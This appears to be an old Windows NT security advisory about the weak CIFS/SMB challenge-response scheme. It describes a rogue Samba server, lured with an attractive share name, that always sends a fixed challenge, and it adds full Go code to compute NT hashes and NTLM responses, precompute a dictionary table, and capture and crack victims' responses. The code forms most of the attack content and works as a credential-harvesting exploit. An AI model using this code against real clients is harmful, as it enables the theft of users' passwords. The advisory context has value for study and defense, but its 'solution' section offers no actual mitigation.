DATE:  
COMMAND                                            SOURCE: 
                                                   AUTHOR: 
  CIFS

SYSTEMS AFFECTED

  Win NT
  

PROBLEM


    Paul Ashton <ashtonp@GB.SWISSBANK.COM> wrote the following in
    response to an article entitled "Windows NT authentication
    weakness" regarding SMB/CIFS problems with the weak challenge
    response system used by Windows NT (see CIFS #1 on this page).

    Set up Samba on a Unix machine together with libdes for DES
    encryption.  Write a 20-line program that takes /usr/dict/words
    or a similar word list, computes the MD4 hash of each word and
    then uses that to encrypt an eight-byte fixed challenge (i.e.
    all zeroes).

    Make a one line change to the challenge generation code to  always
    generate this fixed value.

    Start  Samba  and  give  it  a  suitably interesting name, such as
    "Public picture archive".

    Wait for someone to attempt to connect to your server, send the
    fixed challenge, and receive the fixed challenge encrypted by the
    user's hashed password.  Instantaneously look up the hash in the
    precomputed database.

    If it is not a dictionary word, stuff it into a history file and
    run a modified Crack on it later.



EXPLOIT
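
    The procedure described under PROBLEM, as an added worked example
    (this is not Paul Ashton's program, nor Samba code; Go is used here
    instead of C with libdes so that DES comes from the standard library,
    and MD4, which Go does not ship, is implemented from scratch).  It
    computes the NT hash (MD4 over the UTF-16LE password), derives the
    24-byte NT challenge response (hash zero-padded to 21 bytes, three
    7-byte DES keys, each encrypting the 8-byte challenge), builds the
    response-to-password table under the all-zero fixed challenge, and
    does the lookup with a history list for misses.  The word list and
    the two victim passwords are constructed stand-ins for /usr/dict/words
    and real clients; the Samba side (the one-line challenge change and
    the network listener) is not shown.

```go
package main

import (
	"crypto/des"
	"encoding/binary"
	"encoding/hex"
	"fmt"
	"math/bits"
	"unicode/utf16"
)

// md4 implements MD4 (RFC 1320) from scratch; Go's standard library does
// not ship it, and the NT password hash is MD4.
func md4(msg []byte) [16]byte {
	a, b, c, d := uint32(0x67452301), uint32(0xefcdab89), uint32(0x98badcfe), uint32(0x10325476)
	buf := append([]byte{}, msg...)
	buf = append(buf, 0x80) // pad: 0x80, zeros to 56 mod 64, then LE 64-bit bit length
	for len(buf)%64 != 56 {
		buf = append(buf, 0)
	}
	var ln [8]byte
	binary.LittleEndian.PutUint64(ln[:], uint64(len(msg))*8)
	buf = append(buf, ln[:]...)
	r2 := [16]int{0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15}
	r3 := [16]int{0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15}
	s1, s2, s3 := [4]int{3, 7, 11, 19}, [4]int{3, 5, 9, 13}, [4]int{3, 9, 11, 15}
	for off := 0; off < len(buf); off += 64 {
		var x [16]uint32
		for i := range x {
			x[i] = binary.LittleEndian.Uint32(buf[off+4*i:])
		}
		aa, bb, cc, dd := a, b, c, d
		for i := 0; i < 16; i++ { // round 1: F(b,c,d) = (b & c) | (^b & d)
			t := bits.RotateLeft32(a+((b&c)|(^b&d))+x[i], s1[i%4])
			a, b, c, d = d, t, b, c
		}
		for i := 0; i < 16; i++ { // round 2: G = majority, constant sqrt(2)
			t := bits.RotateLeft32(a+((b&c)|(b&d)|(c&d))+x[r2[i]]+0x5a827999, s2[i%4])
			a, b, c, d = d, t, b, c
		}
		for i := 0; i < 16; i++ { // round 3: H = xor, constant sqrt(3)
			t := bits.RotateLeft32(a+(b^c^d)+x[r3[i]]+0x6ed9eba1, s3[i%4])
			a, b, c, d = d, t, b, c
		}
		a, b, c, d = a+aa, b+bb, c+cc, d+dd
	}
	var out [16]byte
	for i, v := range []uint32{a, b, c, d} {
		binary.LittleEndian.PutUint32(out[4*i:], v)
	}
	return out
}

// NTHash is the NT one-way function: MD4 over the UTF-16LE password.
func NTHash(password string) [16]byte {
	u := utf16.Encode([]rune(password))
	buf := make([]byte, 2*len(u))
	for i, c := range u {
		binary.LittleEndian.PutUint16(buf[2*i:], c)
	}
	return md4(buf)
}

// desKey spreads 7 key bytes over 8 so each byte carries 7 key bits; DES
// ignores the low (parity) bit of each byte, so it is left zero.
func desKey(k []byte) []byte {
	return []byte{
		k[0], k[0]<<7 | k[1]>>1, k[1]<<6 | k[2]>>2, k[2]<<5 | k[3]>>3,
		k[3]<<4 | k[4]>>4, k[4]<<3 | k[5]>>5, k[5]<<2 | k[6]>>6, k[6] << 1,
	}
}

// NTLMResponse is the 24-byte NT response: the 16-byte hash is zero-padded
// to 21 bytes, cut into three 7-byte DES keys, and each encrypts the 8-byte
// challenge. Nothing else goes in, so a fixed challenge makes the response a
// pure function of the password, which is what makes precomputation work.
func NTLMResponse(hash [16]byte, challenge [8]byte) [24]byte {
	var key21 [21]byte
	copy(key21[:], hash[:])
	var resp [24]byte
	for i := 0; i < 3; i++ {
		blk, err := des.NewCipher(desKey(key21[7*i : 7*i+7]))
		if err != nil {
			panic(err)
		}
		blk.Encrypt(resp[8*i:8*i+8], challenge[:])
	}
	return resp
}

// NTHashHex and ResponseHex are convenience wrappers for printing and testing.
func NTHashHex(password string) string { h := NTHash(password); return hex.EncodeToString(h[:]) }
func ResponseHex(password string, challenge [8]byte) string {
	r := NTLMResponse(NTHash(password), challenge)
	return hex.EncodeToString(r[:])
}

// FixedChallenge is what the doctored server always sends: eight zero bytes.
var FixedChallenge [8]byte

// BuildTable precomputes response -> password for a word list under FixedChallenge.
func BuildTable(words []string) map[[24]byte]string {
	t := make(map[[24]byte]string, len(words))
	for _, w := range words {
		t[NTLMResponse(NTHash(w), FixedChallenge)] = w
	}
	return t
}

// RogueServer is the receiving side: table lookup on a hit, history on a miss.
type RogueServer struct {
	Table   map[[24]byte]string
	History [][24]byte // responses not in the table, kept for an offline crack run
}

// Capture handles one client's response and returns the password on a table hit.
func (s *RogueServer) Capture(resp [24]byte) (string, bool) {
	if pw, ok := s.Table[resp]; ok {
		return pw, true
	}
	s.History = append(s.History, resp)
	return "", false
}

func main() {
	words := []string{"password", "secret", "archive", "picture", "letmein"} // constructed stand-in for /usr/dict/words
	srv := &RogueServer{Table: BuildTable(words)}
	for _, victim := range []string{"archive", "Tr0ub4dor&3"} { // constructed victims: one in the list, one not
		resp := NTLMResponse(NTHash(victim), FixedChallenge)
		if pw, ok := srv.Capture(resp); ok {
			fmt.Printf("hit:  %x -> %q\n", resp[:], pw)
		} else {
			fmt.Printf("miss: %x (queued for offline crack)\n", resp[:])
		}
	}
	fmt.Println("history entries:", len(srv.History))
}
```

    The table costs one MD4 and three DES operations per word, once; every
    later capture is a map lookup.  Note that the same code with a real,
    random server challenge gives a different 24-byte value per connection,
    which is exactly why the attack needs the one-line change that pins the
    challenge.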

  

SOLUTION


    A good job that NT's C2 configuration tool disables the network...
    Anyway,  if  you  are  thinking  about  fixing  this,  think about
    'mission impossible' (not a movie).